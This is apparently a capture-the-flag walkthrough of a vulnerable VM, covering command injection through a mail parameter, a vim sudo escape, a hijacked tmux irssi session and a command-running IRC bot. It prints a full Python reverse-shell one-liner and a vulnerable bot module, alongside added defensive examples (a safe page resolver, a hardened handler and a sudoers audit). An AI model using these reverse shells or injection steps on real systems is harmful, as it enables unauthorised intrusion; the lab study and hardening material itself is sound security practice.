Since I failed my first attempt at the OSCP, I’ve been on a holiday hiatus. Now that I’m back and prepping for round 2 of the OSCP exam, I thought I’d try a VM or two out to get my senses about me.
As usual, let’s start off with a quick scan of the network:
Looks like we’ve got SSH and HTTP definitely running on this machine, along with a result for a filtered IRC service. Navigating to the website asks for a username for the CTF. I enter z00n, and am taken to a new page:
Right off the bat, I copy those tips down in my notes and click on the “Start the CTF” link:
One of the first things to notice here is how this particular page is being called with “?page=home”. We may be able to leverage an LFI here. Let’s run wfuzz to find out. The first run through we are given a huge amount of output and a “Connection reset by peer” error:
Checking whether we can still reach the website, we find that the web server is now blocking us. Running another nmap scan shows that the HTTP port has moved to 60080:
Upon connecting to the new HTTP port, we are greeted with a new page with a funny quip about security through obscurity. Let’s try to run that wfuzz command again and narrow our results down:
Cool, it looks like we’ve got about a dozen hits. Going through them from the top, we get a string of “Nice try z00n buddy, this vector has been patched!” messages until we hit contact. Contact doesn’t have anything really useful on it, home is the new page we saw a moment ago, index is the starting page, and then there’s mailer:
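The “?page=home” pattern is worth pausing on from the defender’s side. A page include that builds a file path straight from the request parameter is what makes LFI fuzzing worthwhile in the first place. The following is an added example, not code from this VM or its author: it contrasts that risky resolver with one that uses an allowlist plus a containment check. The pages directory is an assumed path, and the allowed page names are the ones the wfuzz run turned up.

```python
"""Added example: resolving a ``?page=`` parameter safely.

Constructed for illustration; PAGES_DIR is an assumed layout and the
allowlist uses the page names seen in the walkthrough's wfuzz results.
posixpath is used so the path arithmetic is the same on any host.
"""
import posixpath
from typing import Optional

PAGES_DIR = "/var/www/html/pages"                       # assumed location of page templates
ALLOWED_PAGES = {"home", "index", "contact", "mailer"}  # names from the walkthrough's wfuzz hits


def resolve_page_unsafe(page: str) -> str:
    """Mirrors the risky pattern: the client fully controls the included path.

    Equivalent to the PHP idiom ``include($_GET['page'] . '.php')``.
    """
    return posixpath.normpath(posixpath.join(PAGES_DIR, page + ".php"))


def resolve_page(page: str) -> Optional[str]:
    """Allowlist the name first, then verify the final path is still inside PAGES_DIR.

    Returns None for anything that should not be served.  The second check is
    defence in depth: it catches a future allowlist entry that sneaks in a slash.
    """
    if page not in ALLOWED_PAGES:
        return None
    candidate = posixpath.normpath(posixpath.join(PAGES_DIR, page + ".php"))
    if posixpath.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        return None
    return candidate


if __name__ == "__main__":
    for name in ("home", "../../../../etc/passwd"):
        print(f"{name!r:32} unsafe -> {resolve_page_unsafe(name)}")
        print(f"{name!r:32} safe   -> {resolve_page(name)}")
```

The unsafe resolver happily walks out of the pages directory with a few “../” segments; the hardened one rejects the name before any path is built, and would still reject the result even if it had been built.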
There’s a bit of commented-out code that’s interesting here. It looks like we can execute commands through the “&mail=” parameter. Let’s run a “whoami” to find out:
We’ve got code execution! Looks like the server is running as www-data. Let’s try to get a shell with this newfound ability. I’m going to run our Python reverse shell through a URL encoder, turning this:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.50",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
into something suitable for an address bar:
The final URL will look like this:
OK, let’s set up a listener on 443 and run it to see if we get a shell:
We’ve got our first shell! Taking a quick look around the directory we’re dropped into doesn’t net anything very interesting, just the directory structure of the site and some extra pages we missed with wfuzz. Moving onto the home directory, we find a user for the irc service, a user named waldo, and a user named wallaby.
Under the waldo user, we find an interesting shell script for starting irssi (an IRC client run from the command line).
Under the wallaby user, there was a much more interesting directory, .sopel, holding the configuration for an IRC bot. More interesting still were the contents of run.py in the modules directory:
import sopel.module, subprocess, os
from sopel.module import example

# Registers ".run" as a bot command. The listing in the original post omits
# the decorator; it is assumed here so the module is loadable by sopel.
@sopel.module.commands('run')
def run(bot, trigger):
    # trigger.group(2) is everything the IRC user typed after ".run".
    # It goes straight to the shell: no authorisation check, no allowlist.
    os.system('%s' % trigger.group(2))
    # Runs it a second time; without shell=True this only works for a bare
    # command name, so anything with arguments raises here, after os.system
    # has already executed it.
    runas1 = subprocess.Popen('%s' % trigger.group(2), stdout=subprocess.PIPE).communicate()
    runas = str(runas1)
    # Sent unconditionally, and only after the command has already run.
    bot.say('Hold on, you aren\'t Waldo?')
It appears that there was a “run” command added to this bot that allows the user “waldo” to run system commands.
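To make the defensive point concrete, here is an added example (not the VM’s code, and not sopel’s own API beyond the names mentioned) of what a “run” handler looks like when the checks are done in the right order: authorise by full hostmask before anything executes, accept only named commands with fixed argument vectors, and never hand the request text to a shell. The handler logic is kept in a plain function so it can be exercised without sopel installed; in a real module it would be called from a `@sopel.module.commands('run')` function using `trigger.nick`, `trigger.hostmask` and `trigger.group(2)`. The hostmask and command table are constructed values.

```python
"""Added example: a ``.run`` handler that checks before it executes.

Everything here is constructed for illustration.  AUTHORISED holds a full
hostmask rather than a bare nick because a nick is trivially reusable on IRC.
"""
import shlex
import subprocess
from typing import Dict, List, Set

# Constructed hostmask; the real value would come from the bot's config.
AUTHORISED: Set[str] = {"waldo!~waldo@localhost"}

# Named commands only.  The caller picks a name; the argv is fixed here.
ALLOWED_COMMANDS: Dict[str, List[str]] = {
    "ping": ["echo", "pong"],      # harmless liveness check
    "kernel": ["uname", "-s"],     # read-only host fact
}


def handle_run(nick: str, hostmask: str, text: str) -> str:
    """Return the reply for a ``.run <name>`` request.

    In a sopel module: handle_run(trigger.nick, trigger.hostmask, trigger.group(2)).
    """
    # 1. Refuse first.  The original module ran the command and *then* complained.
    if hostmask not in AUTHORISED:
        return f"Hold on, you aren't Waldo? ({nick} is not authorised)"

    # 2. Parse with shlex so quoting tricks are visible as extra tokens.
    try:
        parts = shlex.split(text or "")
    except ValueError:
        return "Could not parse request."

    # 3. Exactly one token, and it must be a known name.  ``ping; id`` becomes
    #    two tokens and is rejected; ``$(id)`` is not a known name and is rejected.
    if len(parts) != 1 or parts[0] not in ALLOWED_COMMANDS:
        return "Unknown command; allowed: " + ", ".join(sorted(ALLOWED_COMMANDS))

    # 4. Argument list with shell=False: the request text never reaches a shell.
    result = subprocess.run(
        ALLOWED_COMMANDS[parts[0]], capture_output=True, text=True, timeout=10
    )
    return result.stdout.strip() or f"(exit {result.returncode})"


if __name__ == "__main__":
    print(handle_run("waldo", "waldo!~waldo@localhost", "ping"))
    print(handle_run("waldo", "waldo!~someone@elsewhere", "ping"))
    print(handle_run("waldo", "waldo!~waldo@localhost", "ping; id"))
```

Even with these checks, a bot that runs host commands on behalf of chat users is a standing privilege boundary; the allowlist is what keeps that boundary narrow, and the hostmask check is what keeps it from being crossed by anyone who can pick a nick.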
After some more digging and no answers, I decided to check the sudo -l output to see if www-data had any sudo powers (which I should have done much earlier):
We’ve got access to run iptables without a password and to vim a specific file as the user waldo. I decided to go the vim route, since breaking out of vim to a shell is easy enough, but first I needed to set my TERM variable:
Then run the appropriate sudo command:
And break out of vim:
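The sudo rule that made this step possible is a common misconfiguration: a NOPASSWD grant on an editor, and editors can spawn shells. The following is an added example, not part of the original post, of a small sudoers audit that flags such rules and suggests sudoedit for the editor case. The sample sudoers text is constructed to loosely resemble the sudo -l output described in the walkthrough; the edited file’s path is a placeholder because the post does not name it.

```python
"""Added example: flag sudoers rules that hand the caller a shell.

Constructed for illustration.  The sample text below is made up; the file
path in the vim rule is a placeholder, not the VM's real path.
"""
import posixpath
import re
from typing import Dict, List

# Programs that can escape to a shell or read/write arbitrary files.  Illustrative, not exhaustive.
SHELL_ESCAPES = {"vim", "vi", "nano", "less", "more", "man", "awk", "find",
                 "python", "python3", "perl", "bash", "sh"}
EDITORS = {"vim", "vi", "nano"}
TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT"}
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")

# user  host=(runas) [TAG:] cmd [, cmd ...]
RULE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")

SAMPLE_SUDOERS = """\
# constructed sample, loosely modelled on the walkthrough's sudo -l output
Defaults env_reset
root     ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /sbin/iptables
www-data ALL=(waldo) NOPASSWD: /usr/bin/vim /home/waldo/PLACEHOLDER_FILE
wallaby  ALL=(ALL) NOPASSWD: ALL
"""


def audit_sudoers(text: str) -> List[Dict[str, str]]:
    """Return one finding per risky command spec, in file order."""
    findings: List[Dict[str, str]] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE.match(line)
        if not m:
            continue
        user, host, runas = m["user"], m["host"], m["runas"] or "root"
        for spec in m["cmds"].split(","):
            tokens = spec.split()
            tags = set()
            while tokens and tokens[0].endswith(":") and tokens[0][:-1] in TAGS:
                tags.add(tokens.pop(0)[:-1])
            if not tokens:
                continue
            cmd, args = tokens[0], " ".join(tokens[1:])
            base = posixpath.basename(cmd)
            nopasswd = "NOPASSWD" in tags
            if cmd == "ALL":
                severity, advice = "high", "unrestricted sudo; scope to specific commands"
            elif base in SHELL_ESCAPES:
                severity = "high"
                if base in EDITORS and args:
                    tag = "NOPASSWD: " if nopasswd else ""
                    advice = f"editor can spawn a shell; replace with: {user} {host}=({runas}) {tag}sudoedit {args}"
                else:
                    advice = f"{base} can spawn a shell or read arbitrary files"
            elif nopasswd:
                severity, advice = "info", "passwordless rule; confirm the program cannot be abused"
            else:
                continue
            findings.append({"line": str(lineno), "user": user, "runas": runas,
                             "cmd": cmd, "severity": severity, "advice": advice})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f['line']:>2} [{f['severity']}] {f['user']} -> {f['runas']}: {f['cmd']}  ({f['advice']})")
```

sudoedit copies the file to a temporary location, opens the editor as the invoking user, and writes the result back as the target user, so the editor’s “:!sh” escape yields only the caller’s own privileges.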
Now that we’ve got access to waldo, let’s revisit that irssi script. It appears that (as a hint from the initial page suggested) this user may have tmux sessions running. Let’s check:
Cool, there’s a tmux session with irssi running. That script shows that it starts irssi up and connects as the waldo user, so let’s attach to the session:
We’ve been dropped directly into an irssi session, sweet. Let’s see if there are any other windows here besides what we can see using the “/WINDOW 2” command:
Awesome! We’re connected to IRC as waldo, let’s try that .run command out:
So we’ve determined that the bot is running as the wallaby user. Let’s try to get a shell from it using a basic bash reverse shell and setting up a listener:
Woo! We’ve got a shell for the wallaby user now! Let’s take a look at the sudo permissions for this account:
Full sudo access, switched to the root user, and grabbed the flag! Pretty entertaining VM, all in all.